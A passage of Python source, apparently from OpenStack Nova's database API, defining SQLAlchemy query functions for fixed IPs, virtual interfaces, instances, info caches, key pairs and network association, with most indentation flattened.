base_model=models.FixedIp, read_deleted="no",
session=session).\
filter(models.FixedIp.allocated == False).\
filter(models.FixedIp.updated_at < time).\
join((models.Network,
models.Network.id == models.FixedIp.network_id)).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(host_filter).\
all()
fixed_ip_ids = [fip[0] for fip in result]
if not fixed_ip_ids:
return 0
result = model_query(context, models.FixedIp, session=session).\
filter(models.FixedIp.id.in_(fixed_ip_ids)).\
update({'instance_uuid': None,
'leased': False,
'updated_at': timeutils.utcnow()},
synchronize_session='fetch')
return result
@require_context
def fixed_ip_get(context, id, get_network=False):
query = model_query(context, models.FixedIp).filter_by(id=id)
if get_network:
query = query.options(joinedload('network'))
result = query.first()
if not result:
raise exception.FixedIpNotFound(id=id)
# FIXME(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = instance_get_by_uuid(context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context, instance.project_id)
return result
@require_admin_context
def fixed_ip_get_all(context):
result = model_query(context, models.FixedIp, read_deleted="yes").all()
if not result:
raise exception.NoFixedIpsDefined()
return result
@require_context
def fixed_ip_get_by_address(context, address, columns_to_join=None):
return _fixed_ip_get_by_address(context, address,
columns_to_join=columns_to_join)
def _fixed_ip_get_by_address(context, address, session=None,
columns_to_join=None):
if session is None:
session = get_session()
if columns_to_join is None:
columns_to_join = []
with session.begin(subtransactions=True):
try:
result = model_query(context, models.FixedIp, session=session)
for column in columns_to_join:
result = result.options(joinedload_all(column))
result = result.filter_by(address=address).first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warn(msg)
raise exception.FixedIpInvalid(msg)
# NOTE(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = _instance_get_by_uuid(
context.elevated(read_deleted='yes'),
result['instance_uuid'],
session
)
nova.context.authorize_project_context(context,
instance.project_id)
return result
@require_admin_context
def fixed_ip_get_by_address_detailed(context, address):
""":returns: a tuple of (models.FixedIp, models.Network, models.Instance)
"""
try:
result = model_query(context, models.FixedIp,
models.Network, models.Instance).\
filter_by(address=address).\
outerjoin((models.Network,
models.Network.id ==
models.FixedIp.network_id)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.FixedIp.instance_uuid)).\
first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warn(msg)
raise exception.FixedIpInvalid(msg)
return result
@require_context
def fixed_ip_get_by_floating_address(context, floating_address):
return model_query(context, models.FixedIp).\
outerjoin(models.FloatingIp,
models.FloatingIp.fixed_ip_id ==
models.FixedIp.id).\
filter(models.FloatingIp.address == floating_address).\
first()
# NOTE(tr3buchet) please don't invent an exception here, empty list is fine
@require_context
def fixed_ip_get_by_instance(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(instance_uuid=instance_uuid).\
all()
if not result:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
return result
@require_admin_context
def fixed_ip_get_by_host(context, host):
session = get_session()
with session.begin():
instance_uuids = _instance_get_all_uuids_by_host(context, host,
session=session)
if not instance_uuids:
return []
return model_query(context, models.FixedIp, session=session).\
filter(models.FixedIp.instance_uuid.in_(instance_uuids)).\
all()
@require_context
def fixed_ip_get_by_network_host(context, network_id, host):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(host=host).\
first()
if not result:
raise exception.FixedIpNotFoundForNetworkHost(network_id=network_id,
host=host)
return result
@require_context
def fixed_ips_by_virtual_interface(context, vif_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(virtual_interface_id=vif_id).\
all()
return result
@require_context
def fixed_ip_update(context, address, values):
session = get_session()
with session.begin():
_fixed_ip_get_by_address(context, address, session=session).\
update(values)
def _fixed_ip_count_by_project(context, project_id, session=None):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.FixedIp.id,
base_model=models.FixedIp, read_deleted="no",
session=session).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(models.Instance.project_id == project_id).\
count()
###################
@require_context
def virtual_interface_create(context, values):
"""Create a new virtual interface record in the database.
:param values: = dict containing column values
"""
try:
vif_ref = models.VirtualInterface()
vif_ref.update(values)
vif_ref.save()
except db_exc.DBError:
raise exception.VirtualInterfaceCreateException()
return vif_ref
def _virtual_interface_query(context, session=None, use_slave=False):
return model_query(context, models.VirtualInterface, session=session,
read_deleted="no", use_slave=use_slave)
@require_context
def virtual_interface_get(context, vif_id):
"""Gets a virtual interface from the table.
:param vif_id: = id of the virtual interface
"""
vif_ref = _virtual_interface_query(context).\
filter_by(id=vif_id).\
first()
return vif_ref
@require_context
def virtual_interface_get_by_address(context, address):
"""Gets a virtual interface from the table.
:param address: = the address of the interface you're looking to get
"""
try:
vif_ref = _virtual_interface_query(context).\
filter_by(address=address).\
first()
except DataError:
msg = _("Invalid virtual interface address %s in request") % address
LOG.warn(msg)
raise exception.InvalidIpAddressError(msg)
return vif_ref
@require_context
def virtual_interface_get_by_uuid(context, vif_uuid):
"""Gets a virtual interface from the table.
:param vif_uuid: the uuid of the interface you're looking to get
"""
vif_ref = _virtual_interface_query(context).\
filter_by(uuid=vif_uuid).\
first()
return vif_ref
@require_context
@require_instance_exists_using_uuid
def virtual_interface_get_by_instance(context, instance_uuid, use_slave=False):
"""Gets all virtual interfaces for instance.
:param instance_uuid: = uuid of the instance to retrieve vifs for
"""
vif_refs = _virtual_interface_query(context, use_slave=use_slave).\
filter_by(instance_uuid=instance_uuid).\
all()
return vif_refs
@require_context
def virtual_interface_get_by_instance_and_network(context, instance_uuid,
network_id):
"""Gets virtual interface for instance that's associated with network."""
vif_ref = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(network_id=network_id).\
first()
return vif_ref
@require_context
def virtual_interface_delete_by_instance(context, instance_uuid):
"""Delete virtual interface records that are associated
with the instance given by instance_id.
:param instance_uuid: = uuid of instance
"""
_virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
@require_context
def virtual_interface_get_all(context):
"""Get all vifs."""
vif_refs = _virtual_interface_query(context).all()
return vif_refs
###################
def _metadata_refs(metadata_dict, meta_class):
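    """Convert a metadata dict into a list of meta_class model objects."""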
metadata_refs = []
if metadata_dict:
for k, v in metadata_dict.iteritems():
metadata_ref = meta_class()
metadata_ref['key'] = k
metadata_ref['value'] = v
metadata_refs.append(metadata_ref)
return metadata_refs
def _validate_unique_server_name(context, session, name):
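    """Raise InstanceExists if the hostname collides within the configured
    scope. The check is case-insensitive and is skipped entirely when
    CONF.osapi_compute_unique_server_name_scope is not set.
    """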
if not CONF.osapi_compute_unique_server_name_scope:
return
lowername = name.lower()
base_query = model_query(context, models.Instance, session=session,
read_deleted=False).\
filter(func.lower(models.Instance.hostname) == lowername)
if CONF.osapi_compute_unique_server_name_scope == 'project':
instance_with_same_name = base_query.\
filter_by(project_id=context.project_id).\
count()
elif CONF.osapi_compute_unique_server_name_scope == 'global':
instance_with_same_name = base_query.count()
else:
msg = _('Unknown osapi_compute_unique_server_name_scope value: %s'
' Flag must be empty, "global" or'
' "project"') % CONF.osapi_compute_unique_server_name_scope
LOG.warn(msg)
return
if instance_with_same_name > 0:
raise exception.InstanceExists(name=lowername)
def _handle_objects_related_type_conversions(values):
"""Make sure that certain things in values (which may have come from
an objects.instance.Instance object) are in suitable form for the
database.
"""
# NOTE(danms): Make sure IP addresses are passed as strings to
# the database engine
for key in ('access_ip_v4', 'access_ip_v6'):
if key in values and values[key] is not None:
values[key] = str(values[key])
datetime_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
convert_objects_related_datetimes(values, *datetime_keys)
@require_context
def instance_create(context, values):
"""Create a new Instance record in the database.
context - request context object
values - dict containing column values.
"""
values = values.copy()
values['metadata'] = _metadata_refs(
values.get('metadata'), models.InstanceMetadata)
values['system_metadata'] = _metadata_refs(
values.get('system_metadata'), models.InstanceSystemMetadata)
_handle_objects_related_type_conversions(values)
instance_ref = models.Instance()
if not values.get('uuid'):
values['uuid'] = str(uuid.uuid4())
instance_ref['info_cache'] = models.InstanceInfoCache()
info_cache = values.pop('info_cache', None)
if info_cache is not None:
instance_ref['info_cache'].update(info_cache)
security_groups = values.pop('security_groups', [])
instance_ref.update(values)
def _get_sec_group_models(session, security_groups):
models = []
default_group = security_group_ensure_default(context)
if 'default' in security_groups:
models.append(default_group)
# Generate a new list, so we don't modify the original
security_groups = [x for x in security_groups if x != 'default']
if security_groups:
models.extend(_security_group_get_by_names(context,
session, context.project_id, security_groups))
return models
session = get_session()
with session.begin():
if 'hostname' in values:
_validate_unique_server_name(context, session, values['hostname'])
instance_ref.security_groups = _get_sec_group_models(session,
security_groups)
session.add(instance_ref)
# create the instance uuid to ec2_id mapping entry for instance
ec2_instance_create(context, instance_ref['uuid'])
return instance_ref
def _instance_data_get_for_user(context, project_id, user_id, session=None):
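    """Return a (instance count, total vcpus, total memory_mb) tuple for
    the project, optionally narrowed to a single user.
    """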
result = model_query(context,
func.count(models.Instance.id),
func.sum(models.Instance.vcpus),
func.sum(models.Instance.memory_mb),
base_model=models.Instance,
session=session).\
filter_by(project_id=project_id)
if user_id:
result = result.filter_by(user_id=user_id).first()
else:
result = result.first()
# NOTE(vish): convert None to 0
return (result[0] or 0, result[1] or 0, result[2] or 0)
@require_context
def instance_destroy(context, instance_uuid, constraint=None):
session = get_session()
with session.begin():
if uuidutils.is_uuid_like(instance_uuid):
instance_ref = _instance_get_by_uuid(context, instance_uuid,
session=session)
else:
raise exception.InvalidUUID(instance_uuid)
query = model_query(context, models.Instance, session=session).\
filter_by(uuid=instance_uuid)
if constraint is not None:
query = constraint.apply(models.Instance, query)
count = query.soft_delete()
if count == 0:
raise exception.ConstraintNotMet()
model_query(context, models.SecurityGroupInstanceAssociation,
session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceInfoCache, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceMetadata, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceFault, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
return instance_ref
@require_context
def instance_get_by_uuid(context, uuid, columns_to_join=None, use_slave=False):
return _instance_get_by_uuid(context, uuid,
columns_to_join=columns_to_join, use_slave=use_slave)
def _instance_get_by_uuid(context, uuid, session=None,
columns_to_join=None, use_slave=False):
result = _build_instance_get(context, session=session,
columns_to_join=columns_to_join,
use_slave=use_slave).\
filter_by(uuid=uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=uuid)
return result
@require_context
def instance_get(context, instance_id, columns_to_join=None):
try:
result = _build_instance_get(context, columns_to_join=columns_to_join
).filter_by(id=instance_id).first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
except DataError:
# NOTE(sdague): catch all in case the db engine chokes on the
# id because it's too long of an int to store.
msg = _("Invalid instance id %s in request") % instance_id
LOG.warn(msg)
raise exception.InvalidID(id=instance_id)
def _build_instance_get(context, session=None,
columns_to_join=None, use_slave=False):
query = model_query(context, models.Instance, session=session,
project_only=True, use_slave=use_slave).\
options(joinedload_all('security_groups.rules')).\
options(joinedload('info_cache'))
if columns_to_join is None:
columns_to_join = ['metadata', 'system_metadata']
for column in columns_to_join:
if column in ['info_cache', 'security_groups']:
# Already always joined above
continue
query = query.options(joinedload(column))
    # NOTE(alaski): Stop lazy loading of columns not needed.
for col in ['metadata', 'system_metadata']:
if col not in columns_to_join:
query = query.options(noload(col))
return query
def _instances_fill_metadata(context, instances,
manual_joins=None, use_slave=False):
"""Selectively fill instances with manually-joined metadata. Note that
instance will be converted to a dict.
:param context: security context
:param instances: list of instances to fill
:param manual_joins: list of tables to manually join (can be any
combination of 'metadata' and 'system_metadata' or
None to take the default of both)
"""
uuids = [inst['uuid'] for inst in instances]
if manual_joins is None:
manual_joins = ['metadata', 'system_metadata']
meta = collections.defaultdict(list)
if 'metadata' in manual_joins:
for row in _instance_metadata_get_multi(context, uuids,
use_slave=use_slave):
meta[row['instance_uuid']].append(row)
sys_meta = collections.defaultdict(list)
if 'system_metadata' in manual_joins:
for row in _instance_system_metadata_get_multi(context, uuids,
use_slave=use_slave):
sys_meta[row['instance_uuid']].append(row)
pcidevs = collections.defaultdict(list)
if 'pci_devices' in manual_joins:
for row in _instance_pcidevs_get_multi(context, uuids):
pcidevs[row['instance_uuid']].append(row)
filled_instances = []
for inst in instances:
inst = dict(inst.iteritems())
inst['system_metadata'] = sys_meta[inst['uuid']]
inst['metadata'] = meta[inst['uuid']]
if 'pci_devices' in manual_joins:
inst['pci_devices'] = pcidevs[inst['uuid']]
filled_instances.append(inst)
return filled_instances
def _manual_join_columns(columns_to_join):
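    """Split columns_to_join into (manual_joins, columns_to_join).

    Metadata-style columns are filled in manually by
    _instances_fill_metadata() rather than joined by SQLAlchemy.
    """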
manual_joins = []
for column in ('metadata', 'system_metadata', 'pci_devices'):
if column in columns_to_join:
columns_to_join.remove(column)
manual_joins.append(column)
return manual_joins, columns_to_join
@require_context
def instance_get_all(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join = _manual_join_columns(columns_to_join)
query = model_query(context, models.Instance)
for column in columns_to_join:
query = query.options(joinedload(column))
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
query = query.filter_by(project_id=context.project_id)
else:
query = query.filter_by(user_id=context.user_id)
instances = query.all()
return _instances_fill_metadata(context, instances, manual_joins)
@require_context
def instance_get_all_by_filters(context, filters, sort_key, sort_dir,
limit=None, marker=None, columns_to_join=None,
use_slave=False):
"""Return instances that match all filters. Deleted instances
will be returned by default, unless there's a filter that says
otherwise.
Depending on the name of a filter, matching for that filter is
performed using either exact matching or as regular expression
matching. Exact matching is applied for the following filters:
['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'system_metadata']
    A third type of filter (also using exact matching) filters based on
    instance metadata tags when supplied under a special key named
    'filter'.
filters = {
'filter': [
{'name': 'tag-key', 'value': '<metakey>'},
{'name': 'tag-value', 'value': '<metaval>'},
{'name': 'tag:<metakey>', 'value': '<metaval>'}
]
}
    Special keys are used to tweak the query further:
    'changes-since' - only return instances updated after this time
'deleted' - only return (or exclude) deleted instances
'soft_deleted' - modify behavior of 'deleted' to either
include or exclude instances whose
vm_state is SOFT_DELETED.
"""
sort_fn = {'desc': desc, 'asc': asc}
if CONF.database.slave_connection == '':
use_slave = False
session = get_session(use_slave=use_slave)
if columns_to_join is None:
columns_to_join = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join = _manual_join_columns(columns_to_join)
query_prefix = session.query(models.Instance)
for column in columns_to_join:
query_prefix = query_prefix.options(joinedload(column))
query_prefix = query_prefix.order_by(sort_fn[sort_dir](
getattr(models.Instance, sort_key)))
# Make a copy of the filters dictionary to use going forward, as we'll
# be modifying it and we shouldn't affect the caller's use of it.
filters = filters.copy()
if 'changes-since' in filters:
changes_since = timeutils.normalize_time(filters['changes-since'])
query_prefix = query_prefix.\
filter(models.Instance.updated_at >= changes_since)
if 'deleted' in filters:
# Instances can be soft or hard deleted and the query needs to
# include or exclude both
if filters.pop('deleted'):
if filters.pop('soft_deleted', True):
deleted = or_(
models.Instance.deleted == models.Instance.id,
models.Instance.vm_state == vm_states.SOFT_DELETED
)
query_prefix = query_prefix.\
filter(deleted)
else:
query_prefix = query_prefix.\
filter(models.Instance.deleted == models.Instance.id)
else:
query_prefix = query_prefix.\
filter_by(deleted=0)
if not filters.pop('soft_deleted', False):
# It would be better to have vm_state not be nullable
# but until then we test it explicitly as a workaround.
not_soft_deleted = or_(
models.Instance.vm_state != vm_states.SOFT_DELETED,
models.Instance.vm_state == None
)
query_prefix = query_prefix.filter(not_soft_deleted)
if 'cleaned' in filters:
if filters.pop('cleaned'):
query_prefix = query_prefix.filter(models.Instance.cleaned == 1)
else:
query_prefix = query_prefix.filter(models.Instance.cleaned == 0)
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
filters['project_id'] = context.project_id
else:
filters['user_id'] = context.user_id
# Filters for exact matches that we can do along with the SQL query...
# For other filters that don't match this, we will do regexp matching
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata']
# Filter the query
query_prefix = exact_filter(query_prefix, models.Instance,
filters, exact_match_filter_names)
query_prefix = regex_filter(query_prefix, models.Instance, filters)
query_prefix = tag_filter(context, query_prefix, models.Instance,
models.InstanceMetadata,
models.InstanceMetadata.instance_uuid,
filters)
# paginate query
if marker is not None:
try:
marker = _instance_get_by_uuid(context, marker, session=session)
except exception.InstanceNotFound:
raise exception.MarkerNotFound(marker)
query_prefix = sqlalchemyutils.paginate_query(query_prefix,
models.Instance, limit,
[sort_key, 'created_at', 'id'],
marker=marker,
sort_dir=sort_dir)
return _instances_fill_metadata(context, query_prefix.all(), manual_joins)
def tag_filter(context, query, model, model_metadata,
model_uuid, filters):
"""Applies tag filtering to a query.
Returns the updated query. This method alters filters to remove
keys that are tags. This filters on resources by tags - this
method assumes that the caller will take care of access control
:param query: query to apply filters to
:param model: model object the query applies to
:param filters: dictionary of filters
"""
if filters.get('filter') is None:
return query
or_query = None
def _to_list(val):
if isinstance(val, dict):
val = val.values()
if not isinstance(val, (tuple, list, set)):
val = (val,)
return val
for filter_block in filters['filter']:
if not isinstance(filter_block, dict):
continue
filter_name = filter_block.get('name')
if filter_name is None:
continue
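        # Both the 'tag-' and 'tag:' prefixes are four characters long, so
        # slicing off the first four characters yields the tag key in
        # either case.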
tag_name = filter_name[4:]
tag_val = _to_list(filter_block.get('value'))
if filter_name.startswith('tag-'):
if tag_name not in ['key', 'value']:
msg = _("Invalid field name: %s") % tag_name
raise exception.InvalidParameterValue(err=msg)
subq = getattr(model_metadata, tag_name).in_(tag_val)
or_query = subq if or_query is None else or_(or_query, subq)
elif filter_name.startswith('tag:'):
subq = model_query(context, model_uuid,
session=query.session, base_model=model_metadata).\
filter_by(key=tag_name).\
filter(model_metadata.value.in_(tag_val))
query = query.filter(model.uuid.in_(subq))
if or_query is not None:
subq = model_query(context, model_uuid,
session=query.session, base_model=model_metadata).\
filter(or_query)
query = query.filter(model.uuid.in_(subq))
return query
def regex_filter(query, model, filters):
"""Applies regular expression filtering to a query.
Returns the updated query.
:param query: query to apply filters to
:param model: model object the query applies to
:param filters: dictionary of filters with regex values
"""
regexp_op_map = {
'postgresql': '~',
'mysql': 'REGEXP',
'sqlite': 'REGEXP'
}
db_string = CONF.database.connection.split(':')[0].split('+')[0]
db_regexp_op = regexp_op_map.get(db_string, 'LIKE')
for filter_name in filters.iterkeys():
try:
column_attr = getattr(model, filter_name)
except AttributeError:
continue
if 'property' == type(column_attr).__name__:
continue
if db_regexp_op == 'LIKE':
query = query.filter(column_attr.op(db_regexp_op)(
'%' + str(filters[filter_name]) + '%'))
else:
query = query.filter(column_attr.op(db_regexp_op)(
str(filters[filter_name])))
return query
@require_context
def instance_get_active_by_window_joined(context, begin, end=None,
project_id=None, host=None):
"""Return instances and joins that were active during window."""
session = get_session()
query = session.query(models.Instance)
query = query.options(joinedload('info_cache')).\
options(joinedload('security_groups')).\
filter(or_(models.Instance.terminated_at == None,
models.Instance.terminated_at > begin))
if end:
query = query.filter(models.Instance.launched_at < end)
if project_id:
query = query.filter_by(project_id=project_id)
if host:
query = query.filter_by(host=host)
return _instances_fill_metadata(context, query.all())
def _instance_get_all_query(context, project_only=False,
joins=None, use_slave=False):
if joins is None:
joins = ['info_cache', 'security_groups']
query = model_query(context,
models.Instance,
project_only=project_only,
use_slave=use_slave)
for join in joins:
query = query.options(joinedload(join))
return query
@require_admin_context
def instance_get_all_by_host(context, host,
columns_to_join=None,
use_slave=False):
return _instances_fill_metadata(context,
_instance_get_all_query(context,
use_slave=use_slave).filter_by(host=host).all(),
manual_joins=columns_to_join,
use_slave=use_slave)
def _instance_get_all_uuids_by_host(context, host, session=None):
"""Return a list of the instance uuids on a given host.
Returns a list of UUIDs, not Instance model objects. This internal version
allows you to specify a session object as a kwarg.
"""
uuids = []
for tuple in model_query(context, models.Instance.uuid, read_deleted="no",
base_model=models.Instance, session=session).\
filter_by(host=host).\
all():
uuids.append(tuple[0])
return uuids
@require_admin_context
def instance_get_all_by_host_and_node(context, host, node):
return _instances_fill_metadata(context,
_instance_get_all_query(context, joins=[]).filter_by(host=host).
filter_by(node=node).all(), manual_joins=[])
@require_admin_context
def instance_get_all_by_host_and_not_type(context, host, type_id=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).
filter(models.Instance.instance_type_id != type_id).all())
# NOTE(jkoelker) This is only being left here for compat with floating
#                ips. Currently the network_api doesn't return floaters
#                in network_info. Once it starts returning the model, this
#                function and its call in compute/manager.py at line 1829 can
#                go away.
@require_context
def instance_get_floating_address(context, instance_id):
instance = instance_get(context, instance_id)
fixed_ips = fixed_ip_get_by_instance(context, instance['uuid'])
if not fixed_ips:
return None
# NOTE(tr3buchet): this only gets the first fixed_ip
# won't find floating ips associated with other fixed_ips
floating_ips = floating_ip_get_by_fixed_address(context,
fixed_ips[0]['address'])
if not floating_ips:
return None
# NOTE(vish): this just returns the first floating ip
return floating_ips[0]['address']
@require_context
def instance_floating_address_get_all(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
fixed_ip_ids = model_query(context, models.FixedIp.id,
base_model=models.FixedIp).\
filter_by(instance_uuid=instance_uuid).\
all()
if not fixed_ip_ids:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
fixed_ip_ids = [fixed_ip_id.id for fixed_ip_id in fixed_ip_ids]
floating_ips = model_query(context, models.FloatingIp.address,
base_model=models.FloatingIp).\
filter(models.FloatingIp.fixed_ip_id.in_(fixed_ip_ids)).\
all()
return [floating_ip.address for floating_ip in floating_ips]
# NOTE(hanlind): This method can be removed as conductor RPC API moves to v2.0.
@require_admin_context
def instance_get_all_hung_in_rebooting(context, reboot_window):
reboot_window = (timeutils.utcnow() -
datetime.timedelta(seconds=reboot_window))
# NOTE(danms): this is only used in the _poll_rebooting_instances()
# call in compute/manager, so we can avoid the metadata lookups
# explicitly
return _instances_fill_metadata(context,
model_query(context, models.Instance).
filter(models.Instance.updated_at <= reboot_window).
filter_by(task_state=task_states.REBOOTING).all(),
manual_joins=[])
@require_context
def instance_update(context, instance_uuid, values):
instance_ref = _instance_update(context, instance_uuid, values)[1]
return instance_ref
@require_context
def instance_update_and_get_original(context, instance_uuid, values,
columns_to_join=None):
"""Set the given properties on an instance and update it. Return
a shallow copy of the original instance reference, as well as the
updated one.
:param context: = request context object
:param instance_uuid: = instance uuid
:param values: = dict containing column values
If "expected_task_state" exists in values, the update can only happen
when the task state before update matches expected_task_state. Otherwise
a UnexpectedTaskStateError is thrown.
:returns: a tuple of the form (old_instance_ref, new_instance_ref)
Raises NotFound if instance does not exist.
"""
return _instance_update(context, instance_uuid, values,
copy_old_instance=True,
columns_to_join=columns_to_join)
# NOTE(danms): This updates the instance's metadata list in-place and in
# the database to avoid stale data and refresh issues. It assumes the
# delete=True behavior of instance_metadata_update(...)
def _instance_metadata_update_in_place(context, instance, metadata_type, model,
metadata, session):
metadata = dict(metadata)
to_delete = []
for keyvalue in instance[metadata_type]:
key = keyvalue['key']
if key in metadata:
keyvalue['value'] = metadata.pop(key)
elif key not in metadata:
to_delete.append(keyvalue)
for condemned in to_delete:
condemned.soft_delete(session=session)
for key, value in metadata.iteritems():
newitem = model()
newitem.update({'key': key, 'value': value,
'instance_uuid': instance['uuid']})
session.add(newitem)
instance[metadata_type].append(newitem)
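# Illustrative behaviour of the in-place update above, with hypothetical
# values: if the instance currently has metadata rows {'a': '1', 'b': '2'}
# and the caller passes metadata={'a': '9', 'c': '3'}, then
#   - 'a' is updated in place to '9',
#   - 'b' is soft-deleted (mirroring the delete=True behavior of
#     instance_metadata_update), and
#   - 'c' is added as a new row and appended to instance[metadata_type].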
def _instance_update(context, instance_uuid, values, copy_old_instance=False,
columns_to_join=None):
session = get_session()
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(instance_uuid)
with session.begin():
instance_ref = _instance_get_by_uuid(context, instance_uuid,
session=session,
columns_to_join=columns_to_join)
if "expected_task_state" in values:
# it is not a db column so always pop out
expected = values.pop("expected_task_state")
if not isinstance(expected, (tuple, list, set)):
expected = (expected,)
actual_state = instance_ref["task_state"]
if actual_state not in expected:
if actual_state == task_states.DELETING:
raise exception.UnexpectedDeletingTaskStateError(
actual=actual_state, expected=expected)
else:
raise exception.UnexpectedTaskStateError(
actual=actual_state, expected=expected)
if "expected_vm_state" in values:
expected = values.pop("expected_vm_state")
if not isinstance(expected, (tuple, list, set)):
expected = (expected,)
actual_state = instance_ref["vm_state"]
if actual_state not in expected:
raise exception.UnexpectedVMStateError(actual=actual_state,
expected=expected)
instance_hostname = instance_ref['hostname'] or ''
if ("hostname" in values and
values["hostname"].lower() != instance_hostname.lower()):
_validate_unique_server_name(context,
session,
values['hostname'])
if copy_old_instance:
old_instance_ref = copy.copy(instance_ref)
else:
old_instance_ref = None
metadata = values.get('metadata')
if metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'metadata',
models.InstanceMetadata,
values.pop('metadata'),
session)
system_metadata = values.get('system_metadata')
if system_metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'system_metadata',
models.InstanceSystemMetadata,
values.pop('system_metadata'),
session)
_handle_objects_related_type_conversions(values)
instance_ref.update(values)
session.add(instance_ref)
return (old_instance_ref, instance_ref)
def instance_add_security_group(context, instance_uuid, security_group_id):
"""Associate the given security group with the given instance."""
sec_group_ref = models.SecurityGroupInstanceAssociation()
sec_group_ref.update({'instance_uuid': instance_uuid,
'security_group_id': security_group_id})
sec_group_ref.save()
@require_context
def instance_remove_security_group(context, instance_uuid, security_group_id):
"""Disassociate the given security group from the given instance."""
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
filter_by(security_group_id=security_group_id).\
soft_delete()
###################
@require_context
def instance_info_cache_get(context, instance_uuid):
"""Gets an instance info cache from the table.
:param instance_uuid: = uuid of the info cache's instance
:param session: = optional session object
"""
return model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
def instance_info_cache_update(context, instance_uuid, values):
"""Update an instance info cache record in the table.
:param instance_uuid: = uuid of info cache's instance
:param values: = dict containing column values to update
:param session: = optional session object
"""
session = get_session()
with session.begin():
info_cache = model_query(context, models.InstanceInfoCache,
session=session).\
filter_by(instance_uuid=instance_uuid).\
first()
if info_cache and info_cache['deleted']:
raise exception.InstanceInfoCacheNotFound(
instance_uuid=instance_uuid)
elif not info_cache:
# NOTE(tr3buchet): just in case someone blows away an instance's
# cache entry, re-create it.
info_cache = models.InstanceInfoCache()
values['instance_uuid'] = instance_uuid
try:
info_cache.update(values)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to
# recreate the instance cache entry at the same time. First one
# wins.
pass
return info_cache
@require_context
def instance_info_cache_delete(context, instance_uuid):
"""Deletes an existing instance_info_cache record
:param instance_uuid: = uuid of the instance tied to the cache record
:param session: = optional session object
"""
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
###################
@require_context
def key_pair_create(context, values):
try:
key_pair_ref = models.KeyPair()
key_pair_ref.update(values)
key_pair_ref.save()
return key_pair_ref
except db_exc.DBDuplicateEntry:
raise exception.KeyPairExists(key_name=values['name'])
@require_context
def key_pair_destroy(context, user_id, name):
nova.context.authorize_user_context(context, user_id)
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
soft_delete()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
@require_context
def key_pair_get(context, user_id, name):
nova.context.authorize_user_context(context, user_id)
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
first()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
return result
@require_context
def key_pair_get_all_by_user(context, user_id):
nova.context.authorize_user_context(context, user_id)
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
all()
def key_pair_count_by_user(context, user_id):
nova.context.authorize_user_context(context, user_id)
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
count()
###################
@require_admin_context
def network_associate(context, project_id, network_id=None, force=False):
"""Associate a project with a network.
called by project_get_networks under certain conditions
and network manager add_network_to_project()
only associate if the project doesn't already have a network
or if force is True
force solves race condition where a fresh project has multiple instance
builds simultaneously picked up by multiple network hosts which attempt
to associate the project with multiple networks
force should only be used as a direct consequence of user request
all automated requests should not use force
"""
session = get_session()
with session.begin():
def network_query(project_filter, id=None):
filter_kwargs = {'project_id': project_filter}
if id is not None:
filter_kwargs['id'] = id
return model_query(context, models.Network, session=session,
read_deleted="no").\
filter_by(**filter_kwargs).\
with_lockmode('update').\
first()
if not force:
# find out if project has a network
network_ref = network_query(project_id)
if force or not network_ref:
